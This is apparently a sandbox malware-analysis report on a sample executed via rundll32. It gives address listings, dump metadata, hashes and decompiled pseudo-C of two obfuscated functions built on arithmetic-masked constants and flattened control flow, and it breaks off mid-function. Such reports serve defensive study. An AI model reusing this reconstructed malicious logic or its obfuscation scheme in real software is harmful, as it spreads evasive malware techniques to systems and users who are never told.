                                                                                                                      0x00171968
                                                                                                                      0x00171969
                                                                                                                      0x0017196c
                                                                                                                      0x0017196d
                                                                                                                      0x0017196e
                                                                                                                      0x00171973
                                                                                                                      0x00171973
                                                                                                                      0x0017197a
                                                                                                                      0x0017197d
                                                                                                                      0x00171983
                                                                                                                      0x0017198a
                                                                                                                      0x0017198f
                                                                                                                      0x00171996
                                                                                                                      0x0017199d
                                                                                                                      0x001719a4
                                                                                                                      0x001719b1
                                                                                                                      0x001719b2
                                                                                                                      0x001719b5
                                                                                                                      0x001719bc
                                                                                                                      0x001719c3
                                                                                                                      0x001719ca
                                                                                                                      0x001719d1
                                                                                                                      0x001719d8
                                                                                                                      0x001719dc
                                                                                                                      0x001719e3
                                                                                                                      0x001719ea
                                                                                                                      0x001719f1
                                                                                                                      0x001719f8
                                                                                                                      0x001719ff
                                                                                                                      0x00171a06
                                                                                                                      0x00171a0d
                                                                                                                      0x00171a11
                                                                                                                      0x00171a18
                                                                                                                      0x00171a1f
                                                                                                                      0x00171a26
                                                                                                                      0x00171a2d
                                                                                                                      0x00171a34
                                                                                                                      0x00171a3b
                                                                                                                      0x00171a42
                                                                                                                      0x00171a4e
                                                                                                                      0x00171a51
                                                                                                                      0x00171a58
                                                                                                                      0x00171a5f
                                                                                                                      0x00171a66
                                                                                                                      0x00171a6d
                                                                                                                      0x00171a74
                                                                                                                      0x00171a7b
                                                                                                                      0x00171a82
                                                                                                                      0x00171a89
                                                                                                                      0x00171a90
                                                                                                                      0x00171a97
                                                                                                                      0x00171a9b
                                                                                                                      0x00171a9f
                                                                                                                      0x00171aa6
                                                                                                                      0x00171aad
                                                                                                                      0x00171ab4
                                                                                                                      0x00171abb
                                                                                                                      0x00171ac5
                                                                                                                      0x00171acf
                                                                                                                      0x00171ad9
                                                                                                                      0x00171ae0
                                                                                                                      0x00171ae7
                                                                                                                      0x00171aee
                                                                                                                      0x00171af8
                                                                                                                      0x00171b02
                                                                                                                      0x00171b0c
                                                                                                                      0x00171b16
                                                                                                                      0x00171b20
                                                                                                                      0x00171b2a
                                                                                                                      0x00171b31
                                                                                                                      0x00171b35
                                                                                                                      0x00171b3e
                                                                                                                      0x00171b4a
                                                                                                                      0x00171b4f
                                                                                                                      0x00171b54
                                                                                                                      0x00171b5b
                                                                                                                      0x00171b62
                                                                                                                      0x00171b6c
                                                                                                                      0x00171b71
                                                                                                                      0x00171b76
                                                                                                                      0x00171b7d
                                                                                                                      0x00171b81
                                                                                                                      0x00171b88
                                                                                                                      0x00171b93
                                                                                                                      0x00171b96
                                                                                                                      0x00171b99
                                                                                                                      0x00171ba0
                                                                                                                      0x00171bae
                                                                                                                      0x00171bb5
                                                                                                                      0x00171bb6
                                                                                                                      0x00171bb9
                                                                                                                      0x00171bc0
                                                                                                                      0x00171bc7
                                                                                                                      0x00171bcb
                                                                                                                      0x00171bd2
                                                                                                                      0x00171bd9
                                                                                                                      0x00171be0
                                                                                                                      0x00171be7
                                                                                                                      0x00171beb
                                                                                                                      0x00171bef
                                                                                                                      0x00171bf6
                                                                                                                      0x00171bfd
                                                                                                                      0x00171c01
                                                                                                                      0x00171c08
                                                                                                                      0x00171c0f
                                                                                                                      0x00171c16
                                                                                                                      0x00171c1d
                                                                                                                      0x00171c24
                                                                                                                      0x00171c2b
                                                                                                                      0x00171c32
                                                                                                                      0x00171c3c
                                                                                                                      0x00171c46
                                                                                                                      0x00171c50
                                                                                                                      0x00171c5c
                                                                                                                      0x00171c5f
                                                                                                                      0x00171c6a
                                                                                                                      0x00171c6d
                                                                                                                      0x00171c74
                                                                                                                      0x00171c7b
                                                                                                                      0x00171c7f
                                                                                                                      0x00171c86
                                                                                                                      0x00171c8d
                                                                                                                      0x00171c94
                                                                                                                      0x00171c9b
                                                                                                                      0x00171ca2
                                                                                                                      0x00171ca9
                                                                                                                      0x00171cb0
                                                                                                                      0x00171cb7
                                                                                                                      0x00171cbe
                                                                                                                      0x00171cc5
                                                                                                                      0x00171cc9
                                                                                                                      0x00171cd0
                                                                                                                      0x00171cda
                                                                                                                      0x00171ce6
                                                                                                                      0x00171cf0
                                                                                                                      0x00171cf7
                                                                                                                      0x00171cfe
                                                                                                                      0x00171d05
                                                                                                                      0x00171d12
                                                                                                                      0x00171d13
                                                                                                                      0x00171d16
                                                                                                                      0x00171d1d
                                                                                                                      0x00171d24
                                                                                                                      0x00171d28
                                                                                                                      0x00171d2f
                                                                                                                      0x00171d36
                                                                                                                      0x00171d42
                                                                                                                      0x00171d45
                                                                                                                      0x00171d48
                                                                                                                      0x00171d4f
                                                                                                                      0x00171d56
                                                                                                                      0x00171d5d
                                                                                                                      0x00171d64
                                                                                                                      0x00171d6b
                                                                                                                      0x00171d6f
                                                                                                                      0x00171d76
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7f
                                                                                                                      0x00000000
                                                                                                                      0x00171d80
                                                                                                                      0x00171d92
                                                                                                                      0x00171f11
                                                                                                                      0x00171f17
                                                                                                                      0x00000000
                                                                                                                      0x00171f17
                                                                                                                      0x00171d9e
                                                                                                                      0x00171e2d
                                                                                                                      0x00171e33
                                                                                                                      0x00171efd
                                                                                                                      0x00171f04
                                                                                                                      0x00171f06
                                                                                                                      0x00171de9
                                                                                                                      0x00171de9
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7f
                                                                                                                      0x00000000
                                                                                                                      0x00171d7f
                                                                                                                      0x00171e39
                                                                                                                      0x00171e39
                                                                                                                      0x00171e40
                                                                                                                      0x00171e69
                                                                                                                      0x00171e69
                                                                                                                      0x00171e6d
                                                                                                                      0x00171e6f
                                                                                                                      0x00171e72
                                                                                                                      0x00171e7e
                                                                                                                      0x00171ead
                                                                                                                      0x00171ec7
                                                                                                                      0x00171ece
                                                                                                                      0x00171ed3
                                                                                                                      0x00171ee0
                                                                                                                      0x00171ee9
                                                                                                                      0x00171ee9
                                                                                                                      0x00171e42
                                                                                                                      0x00171e42
                                                                                                                      0x00171e4a
                                                                                                                      0x00171e4c
                                                                                                                      0x00171e53
                                                                                                                      0x00000000
                                                                                                                      0x00171e55
                                                                                                                      0x00171e55
                                                                                                                      0x00171e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00171e5d
                                                                                                                      0x00171e53
                                                                                                                      0x00171e4a
                                                                                                                      0x00171e5f
                                                                                                                      0x00000000
                                                                                                                      0x00171e5f
                                                                                                                      0x00000000
                                                                                                                      0x00171e33
                                                                                                                      0x00171daa
                                                                                                                      0x00171db2
                                                                                                                      0x00000000
                                                                                                                      0x00171f91
                                                                                                                      0x00171dbe
                                                                                                                      0x00171f70
                                                                                                                      0x00171f70
                                                                                                                      0x00171f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00171dc4
                                                                                                                      0x00171dc4
                                                                                                                      0x00171dd6
                                                                                                                      0x00171de1
                                                                                                                      0x00171de3
                                                                                                                      0x00000000
                                                                                                                      0x00171de3
                                                                                                                      0x00171dbe
                                                                                                                      0x00171e0d
                                                                                                                      0x00171e12
                                                                                                                      0x00171e14
                                                                                                                      0x00171e17
                                                                                                                      0x00171e1a
                                                                                                                      0x00171e20
                                                                                                                      0x00000000
                                                                                                                      0x00171e20
                                                                                                                      0x00171f9a
                                                                                                                      0x00000000
                                                                                                                      0x00171f9a
                                                                                                                      0x00171f21
                                                                                                                      0x00171f24
                                                                                                                      0x00171f2d
                                                                                                                      0x00171f51
                                                                                                                      0x00171f60
                                                                                                                      0x00171f65
                                                                                                                      0x00171f68
                                                                                                                      0x00171f6f
                                                                                                                      0x00000000
                                                                                                                      0x00171f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-3792513126
                                                                                                                      • Opcode ID: f2affc7224f7d2d6baecfe46121695531feeaf4051003563cda7903569105a46
                                                                                                                      • Instruction ID: 460165429ac6f8ed2f28d4a18115b7ab2c306a2a07bbfc1621bb8e7d94b284ab
                                                                                                                      • Opcode Fuzzy Hash: f2affc7224f7d2d6baecfe46121695531feeaf4051003563cda7903569105a46
                                                                                                                      • Instruction Fuzzy Hash: AB022471D0021DEBCF29CFE5C98A9DEBBB1FB44314F208199D51ABA260D7B44A89CF51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00182753 Relevance: 10.2, Strings: 8, Instructions: 239COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00182753(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				unsigned int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				void* _t233;
				void* _t246;
				intOrPtr _t251;
				intOrPtr* _t252;
				void* _t253;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				intOrPtr _t280;
				void* _t281;
				void* _t285;
				signed int* _t286;

				_t252 = __ecx;
				_t286 =  &_v232;
				_v172 = __ecx;
				_v136 = _v136 & 0x00000000;
				_v132 = _v132 & 0x00000000;
				_v140 = 0x217d3d;
				_v176 = 0xa426f0;
				_v176 = _v176 + 0xffffeb7e;
				_v176 = _v176 ^ 0xed8cc375;
				_v176 = _v176 ^ 0xed273dc0;
				_v220 = 0x3129fd;
				_v220 = _v220 + 0xffff6602;
				_v220 = _v220 + 0xfffff7e7;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000cbf49;
				_v212 = 0x151fab;
				_v212 = _v212 + 0x7196;
				_v212 = _v212 + 0xffffb9ae;
				_v212 = _v212 * 0x34;
				_t281 = 0x42637f8;
				_v212 = _v212 ^ 0x045541a5;
				_v148 = 0x54413c;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x0a8ad6a3;
				_v180 = 0x7a2f9c;
				_t276 = 0x52;
				_v180 = _v180 / _t276;
				_t277 = 0x3b;
				_v180 = _v180 * 0x43;
				_v180 = _v180 ^ 0x006060ee;
				_v144 = 0xa6782c;
				_v144 = _v144 + 0x5cb5;
				_v144 = _v144 ^ 0x00a488c7;
				_v228 = 0xec9e27;
				_v228 = _v228 >> 0x10;
				_v228 = _v228 * 0x57;
				_v228 = _v228 * 0x1a;
				_v228 = _v228 ^ 0x00091e6b;
				_v164 = 0xea1f52;
				_v164 = _v164 >> 6;
				_v164 = _v164 ^ 0x000e8f9b;
				_v168 = 0xaa796a;
				_v168 = _v168 << 9;
				_v168 = _v168 << 1;
				_v168 = _v168 ^ 0xa9e52790;
				_v232 = 0xe004fa;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x9f2834c7;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xac158818;
				_v152 = 0x480a21;
				_v152 = _v152 >> 0xa;
				_v152 = _v152 ^ 0x00051613;
				_v192 = 0xe4ba17;
				_v192 = _v192 << 0xc;
				_v192 = _v192 + 0xffffee51;
				_v192 = _v192 * 0x26;
				_v192 = _v192 ^ 0x39f6006f;
				_v184 = 0xc14080;
				_v184 = _v184 + 0xffffa387;
				_v184 = _v184 / _t277;
				_v184 = _v184 ^ 0x000e78de;
				_v224 = 0xaafc1b;
				_v224 = _v224 << 8;
				_v224 = _v224 | 0xe68448c7;
				_v224 = _v224 + 0xffffb5fa;
				_v224 = _v224 ^ 0xeef4be14;
				_v208 = 0x4cb450;
				_v208 = _v208 | 0x41a678b0;
				_v208 = _v208 << 3;
				_v208 = _v208 + 0xffff1daa;
				_v208 = _v208 ^ 0x0f7f4e1f;
				_v156 = 0xa14600;
				_v156 = _v156 | 0x4ac9cb75;
				_v156 = _v156 ^ 0x4ae3fffe;
				_v200 = 0x80f125;
				_v200 = _v200 >> 6;
				_v200 = _v200 + 0xa5;
				_v200 = _v200 + 0x7126;
				_v200 = _v200 ^ 0x0003bf81;
				_v216 = 0xe3f3ee;
				_v216 = _v216 ^ 0x7171deb4;
				_v216 = _v216 ^ 0xe1685078;
				_v216 = _v216 >> 0xf;
				_v216 = _v216 ^ 0x000d439d;
				_v188 = 0x120f5;
				_v188 = _v188 + 0x596b;
				_t152 =  &_v188; // 0x596b
				_t278 = 0x32;
				_v188 =  *_t152 * 0x15;
				_t251 = _v172;
				_v188 = _v188 / _t278;
				_v188 = _v188 ^ 0x0000a7a1;
				_v160 = 0xd711e5;
				_v160 = _v160 | 0x35682df8;
				_v160 = _v160 ^ 0x35f32f5b;
				_v196 = 0xd874e4;
				_t279 = 0x21;
				_t280 = _v172;
				_v196 = _v196 / _t279;
				_v196 = _v196 + 0xffffe729;
				_v196 = _v196 + 0xffff68b4;
				_v196 = _v196 ^ 0x0004b076;
				_v204 = 0xe57f56;
				_v204 = _v204 ^ 0xa54f8096;
				_v204 = _v204 + 0xc8c2;
				_v204 = _v204 + 0xffffef22;
				_v204 = _v204 ^ 0xa5a4489c;
				while(1) {
					L1:
					_t233 = 0xe70005f;
					do {
						while(_t281 != 0x42637f8) {
							if(_t281 == 0x44a4c11) {
								_t285 = E0017EF71(1, 0x10);
								_push(_t285);
								_push(_v148);
								_push( &_v128);
								_t253 = 0xb;
								E00175A07(_t253, _v212);
								_t286 =  &(_t286[5]);
								_t281 = 0x5b07f93;
								goto L9;
							} else {
								if(_t281 == 0x5b07f93) {
									_t280 = E0018C9A9(_v144, _v228,  *_t252, _v164,  *((intOrPtr*)(_t252 + 4)));
									_t286 =  &(_t286[4]);
									__eflags = _t280;
									if(__eflags != 0) {
										_t281 = 0xc9ed25e;
										goto L9;
									}
								} else {
									if(_t281 == 0xc9ed25e) {
										_t285 = 0x4000;
										_push(_t252);
										_push(_t252);
										_t251 = E00183512(0x4000);
										__eflags = _t251;
										_t233 = 0xe70005f;
										_t252 = _v172;
										_t281 =  !=  ? 0xe70005f : 0xdfcaecd;
										continue;
									} else {
										if(_t281 == 0xdfcaecd) {
											E001768DE(_v188, _v160, _v196, _v204, _t280);
										} else {
											_t295 = _t281 - _t233;
											if(_t281 != _t233) {
												goto L15;
											} else {
												_push(_v208);
												_push(_v224);
												_push(0x17136c);
												_t246 = E0017AB66(_v192, _v184, _t295);
												_push(_t280);
												_push( &_v128);
												_push(_t246);
												_push(_t285);
												_push(_t251);
												 *((intOrPtr*)(E0017C1DC(_v192, 0xbf7d08b0, 0xef)))();
												E0017AE03(_v156, _v200, _v216, _t246);
												_t286 =  &(_t286[0xa]);
												_t281 = 0xdfcaecd;
												L9:
												_t252 = _v172;
												goto L1;
											}
										}
									}
								}
							}
							L18:
							return _t251;
						}
						_t281 = 0x44a4c11;
						L15:
						__eflags = _t281 - 0xefc9c40;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                      0x00182753
                                                                                                                      0x00182753
                                                                                                                      0x0018275d
                                                                                                                      0x00182761
                                                                                                                      0x00182768
                                                                                                                      0x0018276d
                                                                                                                      0x00182775
                                                                                                                      0x0018277d
                                                                                                                      0x00182785
                                                                                                                      0x0018278d
                                                                                                                      0x00182795
                                                                                                                      0x0018279d
                                                                                                                      0x001827a5
                                                                                                                      0x001827ad
                                                                                                                      0x001827b2
                                                                                                                      0x001827ba
                                                                                                                      0x001827c2
                                                                                                                      0x001827ca
                                                                                                                      0x001827d7
                                                                                                                      0x001827db
                                                                                                                      0x001827e0
                                                                                                                      0x001827e8
                                                                                                                      0x001827f0
                                                                                                                      0x001827f5
                                                                                                                      0x001827fd
                                                                                                                      0x0018280b
                                                                                                                      0x00182810
                                                                                                                      0x0018281b
                                                                                                                      0x0018281c
                                                                                                                      0x00182820
                                                                                                                      0x00182828
                                                                                                                      0x00182830
                                                                                                                      0x00182838
                                                                                                                      0x00182840
                                                                                                                      0x00182848
                                                                                                                      0x00182852
                                                                                                                      0x0018285b
                                                                                                                      0x0018285f
                                                                                                                      0x00182867
                                                                                                                      0x0018286f
                                                                                                                      0x00182874
                                                                                                                      0x0018287c
                                                                                                                      0x00182884
                                                                                                                      0x00182889
                                                                                                                      0x0018288d
                                                                                                                      0x00182895
                                                                                                                      0x0018289d
                                                                                                                      0x001828a1
                                                                                                                      0x001828a9
                                                                                                                      0x001828ae
                                                                                                                      0x001828b6
                                                                                                                      0x001828be
                                                                                                                      0x001828c3
                                                                                                                      0x001828cb
                                                                                                                      0x001828d3
                                                                                                                      0x001828d8
                                                                                                                      0x001828e5
                                                                                                                      0x001828e9
                                                                                                                      0x001828f1
                                                                                                                      0x001828f9
                                                                                                                      0x00182907
                                                                                                                      0x0018290b
                                                                                                                      0x00182913
                                                                                                                      0x0018291b
                                                                                                                      0x00182920
                                                                                                                      0x00182928
                                                                                                                      0x00182930
                                                                                                                      0x0018293a
                                                                                                                      0x00182942
                                                                                                                      0x0018294a
                                                                                                                      0x0018294f
                                                                                                                      0x00182957
                                                                                                                      0x0018295f
                                                                                                                      0x00182967
                                                                                                                      0x0018296f
                                                                                                                      0x00182977
                                                                                                                      0x0018297f
                                                                                                                      0x00182984
                                                                                                                      0x0018298c
                                                                                                                      0x00182994
                                                                                                                      0x0018299c
                                                                                                                      0x001829a4
                                                                                                                      0x001829ac
                                                                                                                      0x001829b4
                                                                                                                      0x001829b9
                                                                                                                      0x001829c1
                                                                                                                      0x001829c9
                                                                                                                      0x001829d1
                                                                                                                      0x001829d8
                                                                                                                      0x001829df
                                                                                                                      0x001829eb
                                                                                                                      0x001829ef
                                                                                                                      0x001829f3
                                                                                                                      0x001829fb
                                                                                                                      0x00182a03
                                                                                                                      0x00182a0b
                                                                                                                      0x00182a13
                                                                                                                      0x00182a1f
                                                                                                                      0x00182a22
                                                                                                                      0x00182a26
                                                                                                                      0x00182a2a
                                                                                                                      0x00182a32
                                                                                                                      0x00182a3a
                                                                                                                      0x00182a42
                                                                                                                      0x00182a4a
                                                                                                                      0x00182a52
                                                                                                                      0x00182a5a
                                                                                                                      0x00182a62
                                                                                                                      0x00182a6a
                                                                                                                      0x00182a6a
                                                                                                                      0x00182a6a
                                                                                                                      0x00182a6f
                                                                                                                      0x00182a6f
                                                                                                                      0x00182a81
                                                                                                                      0x00182b7d
                                                                                                                      0x00182b86
                                                                                                                      0x00182b87
                                                                                                                      0x00182b8f
                                                                                                                      0x00182b92
                                                                                                                      0x00182b93
                                                                                                                      0x00182b98
                                                                                                                      0x00182b9b
                                                                                                                      0x00000000
                                                                                                                      0x00182a87
                                                                                                                      0x00182a8d
                                                                                                                      0x00182b5c
                                                                                                                      0x00182b5e
                                                                                                                      0x00182b61
                                                                                                                      0x00182b63
                                                                                                                      0x00182b65
                                                                                                                      0x00000000
                                                                                                                      0x00182b65
                                                                                                                      0x00182a93
                                                                                                                      0x00182a99
                                                                                                                      0x00182b10
                                                                                                                      0x00182b1d
                                                                                                                      0x00182b1e
                                                                                                                      0x00182b26
                                                                                                                      0x00182b2e
                                                                                                                      0x00182b30
                                                                                                                      0x00182b36
                                                                                                                      0x00182b3a
                                                                                                                      0x00000000
                                                                                                                      0x00182a9b
                                                                                                                      0x00182aa1
                                                                                                                      0x00182bc9
                                                                                                                      0x00182aa7
                                                                                                                      0x00182aa7
                                                                                                                      0x00182aa9
                                                                                                                      0x00000000
                                                                                                                      0x00182aaf
                                                                                                                      0x00182aaf
                                                                                                                      0x00182ab3
                                                                                                                      0x00182abf
                                                                                                                      0x00182ac4
                                                                                                                      0x00182ad7
                                                                                                                      0x00182ad8
                                                                                                                      0x00182ad9
                                                                                                                      0x00182ada
                                                                                                                      0x00182adb
                                                                                                                      0x00182ae7
                                                                                                                      0x00182af6
                                                                                                                      0x00182afb
                                                                                                                      0x00182afe
                                                                                                                      0x00182b03
                                                                                                                      0x00182b03
                                                                                                                      0x00000000
                                                                                                                      0x00182b03
                                                                                                                      0x00182aa9
                                                                                                                      0x00182aa1
                                                                                                                      0x00182a99
                                                                                                                      0x00182a8d
                                                                                                                      0x00182bd4
                                                                                                                      0x00182bdd
                                                                                                                      0x00182bdd
                                                                                                                      0x00182ba5
                                                                                                                      0x00182baa
                                                                                                                      0x00182baa
                                                                                                                      0x00182baa
                                                                                                                      0x00000000
                                                                                                                      0x00182bb6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !H$&q$<AT$=}!$kYo$o$xPh$``
                                                                                                                      • API String ID: 0-1374268856
                                                                                                                      • Opcode ID: 4936fcd2adc2b69476b9b9001cff313eb7d2a4650d0152a86a5d41ab8517a072
                                                                                                                      • Instruction ID: 8fe95804425604098e56fdfdc0704d50441708f2259852f2f39e5b8415a61c5d
                                                                                                                      • Opcode Fuzzy Hash: 4936fcd2adc2b69476b9b9001cff313eb7d2a4650d0152a86a5d41ab8517a072
                                                                                                                      • Instruction Fuzzy Hash: 03B121725083809FD358DE29C48A50BFBF0BBD4758F104A2DF5A696260D3B5DA49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018A429 Relevance: 9.1, Strings: 7, Instructions: 389COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0018A429(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t471;
				signed int _t488;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t503;
				void* _t552;
				void* _t553;
				signed int _t556;
				signed int* _t558;

				_t558 =  &_v2792;
				_v2604 = _v2604 & 0x00000000;
				_v2616 = 0xa4b63e;
				_v2612 = 0x1047f0;
				_v2608 = 0x380de4;
				_v2640 = 0x3665dd;
				_v2640 = _v2640 >> 1;
				_v2640 = _v2640 ^ 0x001b32c7;
				_v2748 = 0xd91e11;
				_v2748 = _v2748 + 0xffffc541;
				_v2748 = _v2748 ^ 0x51c605c4;
				_v2748 = _v2748 ^ 0x6a8dd901;
				_v2748 = _v2748 ^ 0x3b9e7a9b;
				_v2788 = 0x157b94;
				_v2788 = _v2788 + 0xffffeadc;
				_v2788 = _v2788 >> 0x10;
				_v2788 = _v2788 + 0xffff73d6;
				_v2788 = _v2788 ^ 0xffff2eba;
				_v2716 = 0x64154b;
				_v2716 = _v2716 * 0x75;
				_t552 = __ecx;
				_v2716 = _v2716 << 3;
				_t553 = 0x422d362;
				_v2716 = _v2716 ^ 0x6de46b99;
				_v2720 = 0x9c58cd;
				_v2720 = _v2720 + 0xffff09d2;
				_v2720 = _v2720 + 0x2545;
				_v2720 = _v2720 ^ 0x00913431;
				_v2688 = 0xaeb597;
				_v2688 = _v2688 ^ 0x90c85188;
				_t556 = 0x69;
				_v2688 = _v2688 / _t556;
				_v2688 = _v2688 ^ 0x016f083f;
				_v2624 = 0xf336a7;
				_v2624 = _v2624 ^ 0x0756d720;
				_v2624 = _v2624 ^ 0x07af532c;
				_v2780 = 0x2eb910;
				_v2780 = _v2780 + 0xffff6a34;
				_v2780 = _v2780 + 0x3a3b;
				_v2780 = _v2780 >> 0xc;
				_v2780 = _v2780 ^ 0x00093eda;
				_v2696 = 0x95c01d;
				_v2696 = _v2696 ^ 0xd4af9b47;
				_t488 = 0x43;
				_v2696 = _v2696 * 0x38;
				_v2696 = _v2696 ^ 0x6cc3512a;
				_v2756 = 0x7bda8f;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 + 0xffff790e;
				_v2756 = _v2756 << 1;
				_v2756 = _v2756 ^ 0x00077f92;
				_v2672 = 0xbe500a;
				_v2672 = _v2672 * 0x69;
				_v2672 = _v2672 ^ 0x4e081773;
				_v2664 = 0xf21545;
				_v2664 = _v2664 << 1;
				_v2664 = _v2664 ^ 0x01e0a5ee;
				_v2712 = 0x4aa3d0;
				_v2712 = _v2712 / _t488;
				_v2712 = _v2712 + 0xffffba00;
				_v2712 = _v2712 ^ 0x00096837;
				_v2704 = 0x6e8851;
				_v2704 = _v2704 * 0x4c;
				_v2704 = _v2704 ^ 0x74892048;
				_v2704 = _v2704 ^ 0x54501412;
				_v2740 = 0x9704ff;
				_t491 = 0x4c;
				_v2740 = _v2740 / _t491;
				_v2740 = _v2740 + 0xffff50cb;
				_v2740 = _v2740 / _t556;
				_v2740 = _v2740 ^ 0x0004486b;
				_v2772 = 0xa165e2;
				_t492 = 0x36;
				_v2772 = _v2772 / _t492;
				_v2772 = _v2772 ^ 0x6089554b;
				_t493 = 0x29;
				_v2772 = _v2772 * 0x30;
				_v2772 = _v2772 ^ 0x1a2b5067;
				_v2680 = 0xe9519d;
				_v2680 = _v2680 / _t493;
				_v2680 = _v2680 | 0xd8f73a5a;
				_v2680 = _v2680 ^ 0xd8f0b3ca;
				_v2656 = 0x3fe983;
				_t494 = 0x30;
				_v2656 = _v2656 / _t494;
				_v2656 = _v2656 ^ 0x00046ac2;
				_v2628 = 0x33b4cd;
				_t495 = 0x11;
				_v2628 = _v2628 / _t495;
				_v2628 = _v2628 ^ 0x00043067;
				_v2648 = 0x47920b;
				_t496 = 0x1a;
				_v2648 = _v2648 * 7;
				_v2648 = _v2648 ^ 0x01f55662;
				_v2636 = 0xc27dad;
				_v2636 = _v2636 | 0xeea2905e;
				_v2636 = _v2636 ^ 0xeee70f52;
				_v2792 = 0xce83a7;
				_v2792 = _v2792 | 0x91097b86;
				_v2792 = _v2792 >> 0x10;
				_v2792 = _v2792 + 0xfffff873;
				_v2792 = _v2792 ^ 0x000d88b9;
				_v2764 = 0x687458;
				_v2764 = _v2764 + 0xffff3130;
				_v2764 = _v2764 / _t488;
				_v2764 = _v2764 | 0xf90624cd;
				_v2764 = _v2764 ^ 0xf90653f7;
				_v2784 = 0xf92951;
				_v2784 = _v2784 + 0xffff51be;
				_v2784 = _v2784 ^ 0x8ae9764d;
				_v2784 = _v2784 + 0x99a0;
				_v2784 = _v2784 ^ 0x8a16d001;
				_v2732 = 0xd5993f;
				_v2732 = _v2732 / _t496;
				_v2732 = _v2732 + 0xffff4990;
				_v2732 = _v2732 ^ 0x000978e2;
				_v2724 = 0xcf1521;
				_v2724 = _v2724 >> 2;
				_v2724 = _v2724 << 0xa;
				_v2724 = _v2724 ^ 0xcf1adb57;
				_v2728 = 0xc9d07f;
				_v2728 = _v2728 + 0xffff241f;
				_v2728 = _v2728 + 0xffff5e1a;
				_v2728 = _v2728 ^ 0x00c03f16;
				_v2632 = 0x51b7a0;
				_t497 = 0xd;
				_v2632 = _v2632 / _t497;
				_v2632 = _v2632 ^ 0x0003c006;
				_v2768 = 0xdee1c4;
				_t498 = 0x72;
				_v2768 = _v2768 * 0x4b;
				_v2768 = _v2768 ^ 0x45bd8e4b;
				_v2768 = _v2768 + 0x810;
				_v2768 = _v2768 ^ 0x04f5c4f4;
				_v2620 = 0x673f5;
				_v2620 = _v2620 / _t498;
				_v2620 = _v2620 ^ 0x0006a8dc;
				_v2776 = 0xc1ae10;
				_t499 = 0x5a;
				_v2776 = _v2776 * 0x5d;
				_v2776 = _v2776 / _t499;
				_t500 = 0x7a;
				_v2776 = _v2776 / _t500;
				_v2776 = _v2776 ^ 0x0000f358;
				_v2668 = 0x9bfbd0;
				_v2668 = _v2668 * 0x2e;
